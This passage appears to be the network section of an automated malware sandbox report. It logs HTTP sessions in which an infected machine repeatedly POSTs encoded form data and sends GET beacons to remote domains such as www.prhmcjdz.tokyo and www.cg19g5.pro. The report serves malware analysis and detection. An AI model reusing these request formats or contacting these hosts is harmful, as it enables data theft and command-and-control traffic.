                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 54 4d 6d 71 4e 5a 62 75 73 51 78 38 5a 61 41 54 6e 6b 4f 69 4d 7a 34 2f 51 77 32 31 6e 39 70 61 34 46 6b 70 53 68 32 4f 41 47 34 32 75 4c 37 2b 59 76 63 33 43 78 6b 2f 36 7a 2f 6b 2b 51 78 54 6e 2f 4e 71 55 7a 38 34 73 41 69 51 4a 66 6d 42 66 78 76 4e 57 35 43 6d 62 74 6a 52 38 54 75 46 72 51 36 63 6b 42 64 74 51 64 31 4c 68 72 54 61 37 48 76 65 39 57 30 33 6b 6e 47 53 74 56 65 31 4b 73 41 2b 45 47 6b 55 74 4b 56 6b 38 79 44 57 59 46 4d 50 69 6c 2f 65 6f 75 35 6a 36 49 6a 45 43 6e 42 35 6a 73 69 59 68 4a 70 45 53 36 73 69 6b 6b 32 46 42 77 3d 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwTMmqNZbusQx8ZaATnkOiMz4/Qw21n9pa4FkpSh2OAG42uL7+Yvc3Cxk/6z/k+QxTn/NqUz84sAiQJfmBfxvNW5CmbtjR8TuFrQ6ckBdtQd1LhrTa7Hve9W03knGStVe1KsA+EGkUtKVk8yDWYFMPil/eou5j6IjECnB5jsiYhJpES6sikk2FBw==
                                                                                Nov 25, 2024 12:02:05.819756985 CET508INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:05 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                68192.168.11.20498118.210.46.2180
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:08.358321905 CET744OUTPOST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 56 74 57 71 43 59 62 75 38 41 78 37 63 61 41 54 70 45 4f 6d 4d 7a 30 2f 51 79 62 34 6e 50 64 61 34 6b 30 70 54 67 32 4f 44 47 34 32 6d 72 37 37 48 2f 63 67 43 78 5a 43 36 78 37 6b 2b 51 6c 54 6e 2b 39 71 55 69 38 37 74 51 69 4f 42 2f 6d 50 43 68 76 4e 57 35 43 6d 62 72 50 37 38 53 47 46 71 68 71 63 6c 6b 70 71 54 64 31 45 69 72 54 61 2f 48 76 53 39 57 30 46 6b 6d 71 73 74 58 57 31 4b 70 73 2b 46 58 6b 54 6d 4b 56 75 6b 53 43 46 66 47 64 47 6c 33 7a 77 70 70 68 76 37 59 33 35 4b 52 4d 6a 2b 65 57 38 69 61 31 32 57 4b 56 4b 6d 6d 33 65 63 79 6d 55 6a 64 78 64 75 63 7a 7a 41 2f 51 61 47 53 50 50 59 70 6b 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwVtWqCYbu8Ax7caATpEOmMz0/Qyb4nPda4k0pTg2ODG42mr77H/cgCxZC6x7k+QlTn+9qUi87tQiOB/mPChvNW5CmbrP78SGFqhqclkpqTd1EirTa/HvS9W0FkmqstXW1Kps+FXkTmKVukSCFfGdGl3zwpphv7Y35KRMj+eW8ia12WKVKmm3ecymUjdxduczzA/QaGSPPYpk=
                                                                                Nov 25, 2024 12:02:08.678581953 CET503INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:08 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 12:02:08.678633928 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                69192.168.11.20498128.210.46.2180
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:11.190808058 CET2578OUTPOST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 56 74 57 71 43 59 62 75 38 41 78 37 63 61 41 54 70 45 4f 6d 4d 7a 30 2f 51 79 62 34 6e 50 46 61 37 57 73 70 53 48 71 4f 43 47 34 32 73 4c 37 36 48 2f 63 39 43 78 41 46 36 78 6e 61 2b 53 64 54 6e 59 68 71 44 67 59 37 6d 51 69 4f 65 50 6d 43 66 78 76 55 57 35 79 69 62 74 76 37 38 53 47 46 71 69 69 63 73 52 64 71 66 39 31 4c 68 72 54 65 37 48 76 32 39 53 59 56 6b 6d 76 5a 73 6a 61 31 4b 4a 38 2b 44 6c 4d 54 76 4b 56 67 78 53 44 43 66 47 52 46 6c 30 48 43 70 74 70 57 37 5a 76 35 4a 30 67 38 73 39 4b 32 38 38 68 30 64 37 6f 33 68 33 50 62 61 52 36 41 73 64 74 76 79 71 50 6f 41 4f 38 70 56 68 54 69 48 65 61 6b 5a 76 77 69 41 74 46 67 75 50 35 4c 4d 39 6e 41 63 70 63 2f 31 74 58 77 77 47 4b 58 6f 73 66 4b 72 67 59 70 77 6a 31 7a 35 67 48 39 52 53 70 6e 56 64 77 66 4b 4a 33 4c 34 4b 34 6b 64 4a 65 59 76 2b 39 72 30 50 37 33 76 70 34 4b 77 4a 2f 64 76 77 4b 2b 72 59 75 72 6d 38 31 6e 77 2b 47 37 4a 54 42 4a 4b 41 44 63 72 6a 6d 55 57 4a 61 32 50 58 68 58 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwVtWqCYbu8Ax7caATpEOmMz0/Qyb4nPFa7WspSHqOCG42sL76H/c9CxAF6xna+SdTnYhqDgY7mQiOePmCfxvUW5yibtv78SGFqiicsRdqf91LhrTe7Hv29SYVkmvZsja1KJ8+DlMTvKVgxSDCfGRFl0HCptpW7Zv5J0g8s9K288h0d7o3h3PbaR6AsdtvyqPoAO8pVhTiHeakZvwiAtFguP5LM9nAcpc/1tXwwGKXosfKrgYpwj1z5gH9RSpnVdwfKJ3L4K4kdJeYv+9r0P73vp4KwJ/dvwK+rYurm81nw+G7JTBJKADcrjmUWJa2PXhXJRtrjRk0o7k5XP3afiak9PoKfV7F2AtWLDYUa7/k/RsX+9wxYm1h+RD33H7Y0b/VM665klxqqLVbOUVAQ9MiMsbXsYz3gQxKy+VjUBuplzK2RcsR52zOUvxXLl04K89gmuVZ3QGfw1Xtn+4bjI/KAX4I5O/V2wCIO1kjl2AKP+Hzm2SisW03quxKszamhFdAItwcH2XT9rrOCQYSgbnjIMXM91mKnIBCyhWS3KyagwGZTzE9BB3v80WqGCEeCNw6VXZSxPas24wg5mg7PjVOvBAE+U/gWFnvn/j1816eFfYTGaYVv7QreEAmWT6OC9kdT+UQOLkUKhNG0gamus6I6Ih2KfWyN6y3hDjCf5012SgBnmdJoYVUnlFcVCfKTumtv0zQN6Ms+yzF9sR2N+O1vlXowRdXQ8xPlVIDLqU4JEv69g+iipeEUzpWkH1qxr+QpM2x8DdiWiH0IUe7ajGsxqMzsg+wMspWsA22l5DU/QERzd1SN2DIrNww8Tw/VRtnPu2XxXNYJJe73ThTkGM2yuUq7SLeyOvuDgzBiG2NqPOpPaI4++qb0/z+aLYm6oAWg1UgzRwQkyW0wKaHHk0p6J+W8/rFdts0yLfTpfLc8F/gUaoUWQWDTgpHQcXyD/Dt7dHPEDcEG20/dqeqfAsRM5Dv1BXCNFkRbm [TRUNCATED]
                                                                                Nov 25, 2024 12:02:11.190857887 CET5315OUTData Raw: 7a 32 36 4b 6c 7a 4d 70 4b 54 6b 78 6c 55 4d 4c 52 37 70 51 4d 49 6f 74 38 76 6f 79 63 45 4f 56 2b 52 76 64 65 65 53 57 4d 36 68 67 33 71 7a 6c 41 34 32 50 75 4d 2b 31 53 6b 66 71 59 48 52 79 56 34 6f 50 4c 55 36 2b 72 39 44 44 77 36 63 72 50 4a
                                                                                Data Ascii: z26KlzMpKTkxlUMLR7pQMIot8voycEOV+RvdeeSWM6hg3qzlA42PuM+1SkfqYHRyV4oPLU6+r9DDw6crPJ996Ty83zVR9fC2/Cr/AVYgfkQlj2lYbOLxpcEJuENejVu5bITV/2VakiBxdDjZmY3J5WbdCB5Ul19qSRIKtUPv+R6Jwi6D5sAgqDRytx1TkONTjyS9iek0mtVKpJZwykETnSV3xu5YkFH1s+7Yo/JzztX7nV/txl0
                                                                                Nov 25, 2024 12:02:11.500478983 CET503INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:11 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 12:02:11.500518084 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                70192.168.11.20498138.210.46.2180
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:14.024198055 CET456OUTGET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:14.324695110 CET422INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:14 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Cache: MISS
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 12:02:14.324779987 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                71192.168.11.2049814154.88.22.10580
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:19.636074066 CET712OUTPOST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 79 77 77 65 34 54 68 70 4a 59 70 50 77 49 53 66 4d 78 49 69 4e 52 4f 6d 5a 34 34 39 55 4a 2b 38 4f 43 78 59 4e 57 2f 68 39 76 6b 4a 5a 5a 36 72 6e 6e 7a 49 42 43 37 69 4d 37 41 2f 6d 59 48 4f 75 35 57 46 63 41 50 68 44 41 79 71 39 44 6f 2b 4f 65 47 5a 6f 7a 37 73 4a 74 4e 75 79 30 4f 37 65 34 7a 52 7a 33 56 79 6b 50 42 6e 6b 61 5a 34 41 4a 4a 41 7a 2f 43 74 32 6f 76 33 44 50 76 66 37 57 48 6b 79 4e 4e 46 65 4d 58 4e 63 69 70 62 57 47 56 2f 4a 56 4d 4c 50 47 70 32 48 63 50 74 66 42 6d 4d 73 75 63 69 70 6b 5a 75 55 75 73 69 37 74 69 4d 78 69 56 75 52 72 47 36 57 61 34 59 6c 67 3d 3d
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPwISfMxIiNROmZ449UJ+8OCxYNW/h9vkJZZ6rnnzIBC7iM7A/mYHOu5WFcAPhDAyq9Do+OeGZoz7sJtNuy0O7e4zRz3VykPBnkaZ4AJJAz/Ct2ov3DPvf7WHkyNNFeMXNcipbWGV/JVMLPGp2HcPtfBmMsucipkZuUusi7tiMxiVuRrG6Wa4Ylg==
                                                                                Nov 25, 2024 12:02:19.955864906 CET364INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 b9 41 b9 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 75 fe 5f 5d 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FA>~y!UIf~Y&6Pu_]Z0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                72192.168.11.2049815154.88.22.10580
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:22.460503101 CET732OUTPOST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 79 77 77 65 34 54 68 70 4a 59 70 50 79 72 61 66 41 33 41 69 4c 78 4f 6c 63 34 34 39 65 70 2f 55 4f 43 4e 59 4e 55 54 4c 39 39 41 4a 5a 35 4b 72 6d 6d 7a 49 49 53 37 69 48 62 41 36 69 59 48 56 75 35 53 72 63 45 48 68 44 45 61 71 39 48 6b 2b 4f 76 47 61 71 6a 37 75 63 64 4e 73 32 30 4f 37 65 34 7a 52 7a 33 52 55 6b 50 5a 6e 6b 71 4a 34 41 6f 4a 48 37 66 43 71 2f 49 76 33 48 50 76 62 37 57 48 6a 79 4d 51 4e 65 4f 76 4e 63 6a 5a 62 57 53 42 77 41 56 4e 68 53 57 6f 61 55 4e 6d 33 58 77 4b 6a 67 73 49 48 6f 30 56 31 52 34 68 34 6d 66 57 6f 79 78 4a 63 56 62 2f 53 55 59 35 44 34 70 63 74 32 7a 71 2b 30 53 34 69 71 77 59 7a 36 72 54 54 51 56 45 3d
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPyrafA3AiLxOlc449ep/UOCNYNUTL99AJZ5KrmmzIIS7iHbA6iYHVu5SrcEHhDEaq9Hk+OvGaqj7ucdNs20O7e4zRz3RUkPZnkqJ4AoJH7fCq/Iv3HPvb7WHjyMQNeOvNcjZbWSBwAVNhSWoaUNm3XwKjgsIHo0V1R4h4mfWoyxJcVb/SUY5D4pct2zq+0S4iqwYz6rTTQVE=
                                                                                Nov 25, 2024 12:02:22.779562950 CET364INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 b9 41 b9 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 75 fe 5f 5d 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FA>~y!UIf~Y&6Pu_]Z0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                73192.168.11.2049816154.88.22.10580
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:25.289370060 CET2578OUTPOST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 79 77 77 65 34 54 68 70 4a 59 70 50 79 72 61 66 41 33 41 69 4c 78 4f 6c 63 34 34 39 65 70 2f 55 4f 43 4e 59 4e 55 54 4c 39 39 49 4a 59 4b 43 72 6e 46 4c 49 53 53 37 69 4b 37 41 37 69 59 47 48 75 34 32 76 63 45 44 66 44 43 65 71 38 6b 73 2b 47 37 71 61 6a 6a 37 75 65 64 4e 70 79 30 50 35 65 34 69 61 7a 33 42 55 6b 50 5a 6e 6b 73 46 34 47 35 4a 48 32 2f 43 74 32 6f 76 46 44 50 76 2f 37 57 76 56 79 4d 6c 76 66 2f 50 4e 63 44 4a 62 52 6b 39 77 43 31 4d 48 52 57 6f 43 55 4e 37 70 58 77 57 76 67 74 73 39 6f 31 4e 31 64 4d 64 6c 7a 64 47 2f 75 43 78 55 55 61 2f 5a 56 4a 64 48 2f 72 38 45 32 79 79 6b 7a 6d 6b 68 74 7a 74 6e 67 34 54 4a 46 41 6e 51 33 4a 31 59 66 2f 32 62 67 2b 70 44 43 55 6a 43 30 76 30 50 69 52 4f 6d 73 52 36 36 48 75 52 41 33 4d 78 37 41 50 73 32 42 74 65 67 44 59 6c 38 65 76 37 59 34 56 67 78 71 69 5a 52 6e 56 4b 34 45 57 76 51 78 79 43 33 58 50 79 57 61 58 42 6e 51 56 4c 42 58 75 74 6b 75 44 78 6e 73 66 57 67 57 4e 52 75 53 75 53 42 2f 43 54 58 70 61 44 69 79 4c 2b 37 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPyrafA3AiLxOlc449ep/UOCNYNUTL99IJYKCrnFLISS7iK7A7iYGHu42vcEDfDCeq8ks+G7qajj7uedNpy0P5e4iaz3BUkPZnksF4G5JH2/Ct2ovFDPv/7WvVyMlvf/PNcDJbRk9wC1MHRWoCUN7pXwWvgts9o1N1dMdlzdG/uCxUUa/ZVJdH/r8E2yykzmkhtztng4TJFAnQ3J1Yf/2bg+pDCUjC0v0PiROmsR66HuRA3Mx7APs2BtegDYl8ev7Y4VgxqiZRnVK4EWvQxyC3XPyWaXBnQVLBXutkuDxnsfWgWNRuSuSB/CTXpaDiyL+7YUnMCXa208X64r4hWkygjLjwAtcourQ/XqjfjaYfKYjWFcIgt9KLtZ+glWEShQNb6VEBCSb+RjidlbMLWp1zNkbug/X3yR4pVJ/zuV24pQzX/I+IMM2/Cci1YSgMwaPYPl0BxM4TG2y+tDp1KrFOx0yElGQWao8RF9DkKHSUrEIZRAMhe28vRzjkZmD2ctiVq2zOB3b64q3vXjDXf9HCuPeUuohLP0UpLqNPziLl8MxuTHfX+mZMewExvW7BLnfx5dXxW1Ze1oQFnRuaGMC55sFoVWLBLY1FSli/ikYcG+OIR0ZoYtFkZ8jDMJ3Jn/WnLetgzSXZIfTcuclu+Hng4Dpw304VVgQMk4owoY0ysy4MWy4lc1bIUieTTm6YyzozsxhVl+Q/Rh6Lc+9yPe2j/VUiRrswbnir4QZmjzK+VxeWhvJEMhdTmgmkr4UTRgDSeHsbyV81+yeV3Wii8GZVZHxulz+odMqmqt4inCgsVhbPrHTyKsvBUzWtRS93EPei58hvZa9KLTY2sX8zoRX/EcpegbyesuJFWjN2tdOgdHaupkuU8gjOYSUwjoN1ITYaMUpusDelkKClzJmqjbuPPyF+BwiGIRkrf7rsEazYQINwZYBODqdIJ1W3QN3OBhZpqBWgQBqfCCfD0NSEv56T2iaZpJpQu7oOnI [TRUNCATED]
                                                                                Nov 25, 2024 12:02:25.289396048 CET3867OUTData Raw: 4e 5a 59 39 76 73 2b 43 4a 32 32 50 38 33 63 48 57 48 50 77 73 7a 75 4a 2f 44 56 79 6a 43 55 30 6e 70 37 73 5a 71 66 35 6c 5a 4d 51 73 66 71 51 34 6b 4b 51 48 50 35 41 57 58 4a 54 32 32 2b 41 73 51 74 75 2b 42 4e 4f 36 62 30 51 4f 6b 7a 37 51 46
                                                                                Data Ascii: NZY9vs+CJ22P83cHWHPwszuJ/DVyjCU0np7sZqf5lZMQsfqQ4kKQHP5AWXJT22+AsQtu+BNO6b0QOkz7QFJkAVwFoW6Z7JPKWqZHCBSIYa3tLS4G62UfxpMo2xGAhDbnpcNsHsE+TNd9ZYtwz4ga1O9x5qR6kyfRThwG81InTM4Vxnz67R41eiYZS1hSL6E/QrgoUdK5IevL/z07U1gEA22uhc7tlMIzacm/NR3y3gccmazTD1G
                                                                                Nov 25, 2024 12:02:25.289448977 CET1436OUTData Raw: 4f 75 6e 30 58 4c 4f 7a 71 4a 4e 57 62 52 4c 31 48 36 4a 65 2b 4c 53 45 68 79 39 41 67 44 6c 69 71 44 6c 35 42 31 6c 2f 74 64 48 61 52 47 76 69 38 6f 4f 36 6a 64 5a 36 79 58 54 45 31 62 52 44 57 39 54 56 59 48 68 58 75 51 6d 48 64 65 43 4f 63 4d
                                                                                Data Ascii: Oun0XLOzqJNWbRL1H6Je+LSEhy9AgDliqDl5B1l/tdHaRGvi8oO6jdZ6yXTE1bRDW9TVYHhXuQmHdeCOcM+n5Og4jsBuPTui6BXtwKnZyO8z/6F0AcyrwKfgL6PXUR9buvKokdj5GZCZmoTXMjV8gVsGAvZsmZ+3DewfQ61pn/I3jOS6HRyjta3N3cGwdJyPQWUgoATX6zy4quqtUyf7ttJmd48jv5fwlnwEyDHgyC25EMHWRx/
                                                                                Nov 25, 2024 12:02:25.606828928 CET364INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:02:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 b9 41 b9 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 75 fe 5f 5d 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FA>~y!UIf~Y&6Pu_]Z0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                74192.168.11.2049817154.88.22.10580
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:28.102202892 CET452OUTGET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:28.406161070 CET332INHTTP/1.1 200 OK
                                                                                Server: nginx
